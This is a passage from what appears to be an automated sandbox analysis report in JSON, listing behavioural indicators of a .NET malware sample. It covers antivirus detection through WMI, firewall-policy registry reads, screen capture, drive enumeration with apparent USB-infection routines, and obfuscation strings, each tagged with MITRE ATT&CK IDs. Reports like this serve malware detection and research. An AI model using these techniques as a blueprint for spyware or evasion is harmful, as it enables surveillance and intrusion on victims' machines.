\"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"FindWindow\" (Indicator: \"findwindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"OpenMutexW\" with parameter \"Global\\CLR_CASOFF_MUTEX\" - (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"OpenMutexW\" with parameter \"Global\\.net clr networking\" - (UID: 00000000-00005756)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetLocaleInfoW\" with parameter \"1024\" - (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005756)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-433", "type": 2, "relevance": 1, "name": "Contains ability to execute a WMI query", "description": "Found string \"Select * From AntiVirusProduct\" (Indicator: \"select * from \"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-415", "type": 2, "relevance": 1, "name": "Found registry location string related to firewall policy", "description": "Found string \"KEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000003080ee0700000000000000000048f5070000000000140000008000000000000000000000000000000000000000186d07000100000014000000020000000c0000000000000080ee07007bee07000000000000000000000005000000000160f5240000000000e8f6240095e1d4772e0a3700feffffff435cd8775059d87794000000a00000007aee070078ee0700940000001cf72400fdfebc77000000001800000004e843d3 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064915365000000006491536500000000bcf424009f48d5776691536500000000dcf424000000000066915365e0f424004da3d2750000000000000000dcf42400649153650000000000000000040000000cf524000fa3d275649153650200000000000000000000000800000064915365ffffffff01000080020000005cf5240042a2d275e9fd0000 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000142100355c00000048070900c4000500020026001a0000000000050000000000086d050074fc24000c0000003801050000000000404a0700f8690500106b050020610700f06d050002000000000000004800000078fc2400f4fb24002c48476500000500000000004b484765a0e741d3010000002c8d9d6500000000a8fb0800a3fb08000000000030fc240060179665ffffffff4b484765aa4847650000050000000000400000003cfc2400e543476578480800e848476568e041d3010000002c8d9d6500000000cb0000000200000064fc2400a0fb9765ffffffffe8484765 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006b002000310000000000142100355c00000048070900c4000500020026001a0000000000050000000000086d050074fc24000c0000003801050000000000404a0700f8690500106b050020610700f06d050002000000000000004800000078fc2400f4fb24002c48476500000500000000004b484765a0e741d33f875365a0e741d3010000002c8d9d65000000005cfc240010fc240028769365ffffffff3f8753655d87536548e041d3010000002c8d9d65000000005cfc240038fc240028779365ffffffff5d8753657b87536510e041d3010000002c8d9d65000000005cfc2400 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000008000100010090fa240064fa240064fa24002459d97700000000c0fa24000cb7656590fa240006000000dcfa24000c87d5770000000002000000dcfa2400626fd8773487d577dae2cb7714d59d6572c6bc770000000001000100060000000000000008d59d6528fd07000000000050de9d6500000000bacb2bccb616f34c8990d74c2e8af500dae2cb7780fa24000000000064fc240095e1d477be043700feffffff3487d577c4b665654096656578480800fcb665650100000018fb2400d9b665651cd59d650100000078480800bccebc7700000000000000000000000044fc2400 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001800000014e943d3c386b26b280924000cf8240078fc240060b4b26b8890d3b8feffffffd8f724007b92b16b88f72400fc685365fc6853659492b16b0cf82400 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001500001580ee07000000000000000000406f070000000000140000008000000000000000000000000000000000000000186d07000100000014000000020000000c0000000000000080ee07007bee07000000000000000000000005000000000148f624000000000064fc240095e1d4772e0a3700feffffff435cd8775059d87794000000a00000007aee070078ee070094000000ecf72400fdfebc7700000000180000001ce943d3 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000d2000000d20000000c00000040ac0a0001000000020000000200000010000000d4269d6501000000383d9d6501000000d0f3240060f32400de44476580bb090090f324009f444765b8444765c4ef41d308bc0700d0f32400010000000000000000000000acf324001ce39665ffffffffb84447657d444765ecef41d308bc0700d09d0a00010000008a414d65acef41d308bc07008808090000000000739f4c65a4ef41d308bc07008808090000000000383d9d6500000000e1a74c650000000008bc0700 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000ffffffffe0f224000000000000000000c4f22400dcf22400010000000000000002000000000000000000000034f32400bb364d657401000004000000008001000000420000000000e9364d6560ef41d3020000009cf32400000000004da0d2757c0100002cf3240014f32400180000000500000000800100000000000c740100020000009cf324000000000040f32400b0ea4d6580004200000000000c74010058f3240015ee4d658000420000004200000000000c74010078f3240007ef4d658000420000004200000000000c740100f8bd0a0000000000dcf32400e3ec4d65 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000004010000040100000c000000f8810b0001000000020000000200000010000000d4269d6501000000383d9d650100000040cc2400d0cb2400de44476580bb090000cc24009f444765b844476554d041d388c0070040cc24000100000000000000000000001ccc24001ce39665ffffffffb84447657d4447657cd041d388c0070058d20b00010000008a414d653cd041d388c00700680a090000000000739f4c6534d041d388c00700680a090000000000383d9d6500000000e1a74c650000000088c00700 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000ca000000ca0000000c000000d0500b0001000000020000000200000010000000d4269d6501000000383d9d6501000000ccc924005cc92400de44476580bb09008cc924009f444765b8444765d8d541d308c10700ccc92400010000000000000000000000a8c924001ce39665ffffffffb84447657d444765e0d541d308c1070008c90b00010000008a414d65a0d541d308c10700080a090000000000739f4c65b8d541d308c10700080a090000000000383d9d6500000000e1a74c650000000008c10700 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000002010000020100000c00000028a90b0001000000020000000200000010000000d4269d6501000000383d9d6501000000ecd324007cd32400de44476580bb0900acd324009f444765b8444765f8cf41d388c20700ecd32400010000000000000000000000c8d324001ce39665ffffffffb84447657d44476580cf41d388c20700283d0c00010000008a414d6540c841d388c20700e80b090000000000739f4c6558c841d388c20700e80b090000000000383d9d6500000000e1a74c650000000088c20700 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000ea000000ea0000000c000000e0800d0001000000020000000200000010000000d4269d6501000000383d9d650100000078d1240008d12400de44476580bb090038d124009f444765b84447656ccd41d308c3070078d1240001000000000000000000000054d124001ce39665ffffffffb84447657d44476534cd41d308c30700783c0c00010000008a414d65f4cd41d308c30700880b090000000000739f4c65cccd41d308c30700880b090000000000383d9d6500000000e1a74c650000000008c30700 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000002010000020100000c00000090b90b0001000000020000000200000010000000d4269d6501000000383d9d650100000030e17c01c0e07c01de44476528761200f0e07c019f444765b8444765a4fc19d208c7070030e17c010100000000000000000000000ce17c011ce39665ffffffffb84447657d4447654cfd19d208c70700383f0c00010000008a414d650cfd19d208c70700280e090000000000739f4c6504fd19d208c70700280e090000000000383d9d6500000000e1a74c650000000008c70700 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000da000000da0000000c00000008e80f0001000000020000000200000010000000d4269d6501000000383d9d65010000000cde7c019cdd7c01de44476528761200ccdd7c019f444765b844476598c119d208c807000cde7c01010000000000000000000000e8dd7c011ce39665ffffffffb84447657d444765a0c119d208c8070048410c00010000008a414d6560c219d208c80700880e090000000000739f4c6578c219d208c80700880e090000000000383d9d6500000000e1a74c650000000008c80700 (UID: 00000000-00005756)\n \"netsh.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000d87734020000400200008a052700880527001000000080000000900027001c741c0070751c00cc731c00dc2b370070751c0095e1d477e80f27000000000000f00300e80f270040741c0088052700000027000000270000002700bceed87700002700000027000000270078741c000300000000000000400200000210000074741c008a2ed977000027000a0000003402000090002700000027000210000094741c00c42dd9777f00000002100000010000005001270090002700000000006c751c00322cd977ff2bd877e842f377020000000c024b0000004b003600680001000000 (UID: 00000000-00005928)\n \"netsh.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005928)\n \"netsh.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000f40100000a000000000000000000000070203300c20100000900000050722f00050000000000000032000000b0413300a4741c00cc41d977d039330028000000fc000000ff2bd8776843f377b0211a6cac012f0000002f00310007000100000000000000ff2bd8770400000001000000320002000100000006000000010000000000ffff6b00000098702f00f807000020000000000000000000000068203300886d2f00a86e2f00e839330050722f002000000020741c0000000000a0751c0095e1d477dc2b3700feffffffff2bd8779a2ad877b0211a6ca0211a6c00000000 (UID: 00000000-00005928)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"IsWow64Process\" with parameter \"5756\" - (UID: 00000000-00005756)\n \"netsh.exe\" called \"IsWow64Process\" with parameter \"5928\" - (UID: 00000000-00005928)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005928)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-137", "relevance": 1, "name": "Contains ability to retrieve network adapter information (Dotnet)", "description": "Observed namespace \"System.Net.NetworkInformation\" and TypeReference \"IPGlobalProperties\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"System.Net.NetworkInformation\" and TypeReference \"TcpConnectionInformation\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"System.Net.NetworkInformation\" and TypeReference \"NetworkInterface\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005756)\n \"netsh.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005928)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-119", "relevance": 1, "name": "Contains ability to gather system environment details", "description": "Observed function \"GetEnvironmentVariable\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed function \"SetEnvironmentVariable\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005756)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetWindowTextA\" (UID: 00000000-00005756)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005756)\n \"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005928)\n \"netsh.exe\" called \"LookupAccountSidW\" (UID: 00000000-00005928)\n \"netsh.exe\" called \"LookupAccountSidW\" with param Name LOCAL SERVICE (UID: 00000000-00005928)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-148", "relevance": 1, "name": "Contains ability to get active window titles (Dotnet)", "description": "Observed Namespace \"System.Diagnostics.Process\" and MemberReference \"get_MainWindowTitle\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-120", "relevance": 1, "name": "Contains ability to gather system information (Dotnet)", "description": "Observed function \"get_MachineName\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed function \"get_UserName\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed function \"get_SystemDirectory\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed function \"get_OSVersion\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-66", "type": 1, "relevance": 3, "name": "Contains ability to enumerates all mounted drives", "description": "System.IO.Directory::GetLogicalDrives() at 57b5382e5defa28eb582c820fc05503d-600008f-Usb1~infect\n System.IO.Directory::GetLogicalDrives() at 57b5382e5defa28eb582c820fc05503d-600005a-Fransesco~INS\n System.IO.Directory::GetLogicalDrives() at 57b5382e5defa28eb582c820fc05503d-6000057-Fransesco~Ind", "origin": "Hybrid Analysis Technology", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"ToBase64String\" (Indicator: \"base64\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"ToBase64String\" (Indicator: \"ToBase64String\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"FromBase64String\" (Indicator: \"base64\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"FromBase64String\" (Indicator: \"FromBase64String\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"GZipStream\" (Indicator: \"GzipStream\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"System.Security.Cryptography\" (Indicator: \"System.Security.Cryptography\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"MD5CryptoServiceProvider\" (Indicator: \"md5cryptoserviceprovider\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"ToBase64String\" (Indicator: \"base64\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found string \"ToBase64String\" (Indicator: \"ToBase64String\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found string \"FromBase64String\" (Indicator: \"base64\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found string \"FromBase64String\" (Indicator: \"FromBase64String\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found string \"GZipStream\" (Indicator: \"GzipStream\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found string \"System.Security.Cryptography\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found string \"MD5CryptoServiceProvider\" (Indicator: \"md5cryptoserviceprovider\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found string \"Format_BadBase64Char\" (Indicator: \"base64\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n file/memory contains long string with (Indicator: \"RsaCryptoServiceProvider\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"Uses RsaCryptoServiceProvider to encrypt and decrypt\" (Indicator: \"RsaCryptoServiceProvider\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"e=neutral, PublicKeyToken=b03f5f7f11d50a3a\" description=\"Uses RsaCryptoServiceProvider to encrypt and decrypt\" keyContainerName=\"NetFrameworkConfigurationKey\" cspProviderName=\"\" useMachineContainer=\"true\" useOAEP=\"false\"/>\" (Indicator: \"RsaCryptoServiceProvider\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"CopyFromScreen\" (Indicator: \"CopyFromScreen\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"CopyFromScreen\" (Indicator: \"CopyFromScreen\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-84", "type": 2, "relevance": 1, "name": "Contains ability to find logical drives of the machine (API string)", "description": "Found reference to API \"GetLogicalDrives\" (Indicator: \"GetLogicalDrives\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetLogicalDrives\" (Indicator: \"GetLogicalDrives\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetTempPath\" (Indicator: \"GetTempPath\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetTempFileName\" (Indicator: \"GetTempFileName\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetTempPath\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"GetTempFileName\" (Indicator: \"GetTempFileName\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-507", "type": 2, "relevance": 1, "name": "References to WMI query strings used for information discovery", "description": "Found string \"Select * From AntiVirusProduct\" (Indicator: \"antivirusproduct\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"elect * From AntiVirusProduct\" (Indicator: \"antivirusproduct\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", 